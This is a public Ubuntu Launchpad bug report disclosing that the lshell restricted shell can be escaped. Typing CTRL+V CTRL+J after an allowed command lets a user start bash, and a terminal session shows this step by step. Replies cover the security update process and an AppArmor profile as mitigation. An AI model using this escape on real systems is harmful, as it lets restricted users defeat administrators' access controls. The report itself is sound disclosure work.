Ubuntu
lshell package

Escape possible using special keys

Bug #1627621 reported by Vladislav Yarmak
262
This bug affects 1 person
Affects Status Importance Assigned to Milestone
lshell (Debian)
Fix Released
Unknown
lshell (Ubuntu)
Incomplete
Undecided
Unassigned

Bug Description

Just type <CTRL+V><CTRL+J> after any allowed command and then type desired restricted command:

vladislav@dt1:~$ getent passwd testuser
testuser:x:1001:1002:,,,:/home/testuser:/usr/bin/lshell
vladislav@dt1:~$ su - testuser
Password:
You are in a limited shell.
Type '?' or 'help' to get the list of allowed commands
testuser:~$ ?
cd clear echo exit help history ll lpath ls lsudo
testuser:~$ bash
*** forbidden command: bash
testuser:~$ echo<CTRL+V><CTRL+J>
bash

testuser@dt1:~$ which bash
/bin/bash
testuser@dt1:~$ ps
  PID TTY TIME CMD
29852 pts/14 00:00:00 lshell
29853 pts/14 00:00:00 sh
29854 pts/14 00:00:00 bash
29864 pts/14 00:00:00 ps

Expected: commands in lshell are restricted
What happened: user can escape from lshell and execute arbitrary command

System information:

vladislav@dt1:~$ lsb_release -rd
Description: Ubuntu 16.04.1 LTS
Release: 16.04

vladislav@dt1:~$ apt-cache policy lshell
lshell:
  Установлен: 0.9.17-1
  Кандидат: 0.9.17-1
  Таблица версий:
 *** 0.9.17-1 500
        500 http://ru.archive.ubuntu.com/ubuntu xenial/universe amd64 Packages
        500 http://ru.archive.ubuntu.com/ubuntu xenial/universe i386 Packages
        100 /var/lib/dpkg/status

Bug in upstream issue tracker: https://github.com/ghantoos/lshell/issues/149

ProblemType: Bug
DistroRelease: Ubuntu 16.04
Package: lshell 0.9.17-1
ProcVersionSignature: Ubuntu 4.4.0-38.57-generic 4.4.19
Uname: Linux 4.4.0-38-generic x86_64
NonfreeKernelModules: nvidia_modeset nvidia
ApportVersion: 2.20.1-0ubuntu2.1
Architecture: amd64
CurrentDesktop: XFCE
Date: Mon Sep 26 10:47:40 2016
InstallationDate: Installed on 2016-05-20 (128 days ago)
InstallationMedia: Ubuntu 16.04 LTS "Xenial Xerus" - Release amd64 (20160420.1)
PackageArchitecture: all
SourcePackage: lshell
UpgradeStatus: No upgrade log present (probably fresh install)

Revision history for this message
Vladislav Yarmak (chayt) wrote :
Revision history for this message
Emily Ratliff (emilyr) wrote :

Thanks for taking the time to report this bug and helping to make Ubuntu better. Since the package referred to in this bug is in universe or multiverse, it is community maintained. If you are able, I suggest coordinating with upstream and posting a debdiff for this issue. When a debdiff is available, members of the security team will review it and publish the package. See the following link for more information: https://wiki.ubuntu.com/SecurityTeam/UpdateProcedures

information type: Private Security → Public Security
Changed in lshell (Ubuntu):
status: New → Incomplete
Changed in lshell (Debian):
status: Unknown → Incomplete
Revision history for this message
Seth Arnold (seth-arnold) wrote :

Note that most of these 'restricted shells' tend to be .. porous. If you want to use one, it'd be a good idea to wrap it in an AppArmor profile that would provide belt-and-suspenders approach. e.g., this untested profile would probably solve the issue for you:

/usr/bin/lshell {
  #include <abstractions/base>

  /usr/bin/lshell rmix,
  /usr/lib/python2.7/dist-packages/ r,
  /usr/lib/python2.7/dist-packages/lshell-0.9.17.egg-info r,
  /usr/lib/python2.7/dist-packages/lshell/ r,
  /usr/lib/python2.7/dist-packages/lshell/** r,
  /usr/bin/python2.7 rmix,

  /etc/lshell.conf r,
  /bin/ls rmix,
}

Just add rules for whatever you'd like it to support.

Save it in /etc/apparmor.d/usr.bin.lshell and reload it with sudo systemctl reload apparmor.service. Check dmesg output for DENIED lines and amend as needed.

Thanks

Bug Watch Updater (bug-watch-updater)
Changed in lshell (Debian):
status: Incomplete → Confirmed
Bug Watch Updater (bug-watch-updater)
Changed in lshell (Debian):
status: Confirmed → Fix Released
To post a comment you must log in.
This report contains Public Security information  
Everyone can see this security related information.

Duplicates of this bug

Subscribing...

Other bug subscribers

Remote bug watches

Bug watches keep track of this bug in other bug trackers.